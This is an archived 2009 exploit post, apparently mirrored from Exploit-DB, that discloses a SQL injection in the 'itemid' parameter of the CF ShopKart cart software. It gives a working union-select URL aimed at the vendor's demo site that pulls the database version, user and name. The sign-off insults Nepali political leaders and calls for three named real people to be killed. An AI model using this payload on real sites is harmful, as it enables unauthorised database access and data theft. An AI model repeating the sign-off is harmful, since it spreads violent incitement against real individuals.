Lucene search
Learn3r hackerEDB-ID:9710HistorySep 17, 2009 - 12:00 a.m.
CF Shopkart 5.3x - 'itemID' SQL Injection
2009-09-1700:00:00
learn3r hacker
www.exploit-db.com
29
AI Score
7.4
Confidence
Low
#####################################
# CF ShopKart SQL vulnerability #
# By learn3r hacker from Nepal #
# [email protected] #
#####################################
Product name: CF ShopKart
Version: 5.4 beta or may be lower
Product home: www.cfshopkart.com
Affected variable: item
SQLi examples:
http://demo.cfshopkart.com/index.cfm?carttoken=E48384J091709064002&action=ViewDetails&itemid=-928+union+all+select+concat(@@version,user(),database()),2--+
Note that the results of second query are seen in the <title> tag...
Greetz to: sToRm and m0nkee from #gny, sam207 from www.sampctricks.blogspot.com, nepali boka, l@d0_put! HaCKeR and all...
FuCK MaKuNe, G!r!ja, Prachanda and all political leaders of Nepal
K!ll Parmananda Jha, Upendra Yadav and Vijay Gachhedhaar
By learn3r aka cyb3r lord
Nepali Hackerz Are Not Dead!!!
# milw0rm.com [2009-09-17]Related
cvelist
cvelist
CVE-2009-3309
2009-09-23 10:00:00
nvd
nvd
CVE-2009-3309
2009-09-23 12:08:35
prion
prion
Sql injection
2009-09-23 12:08:00
cve
cve
CVE-2009-3309
2009-09-23 12:08:35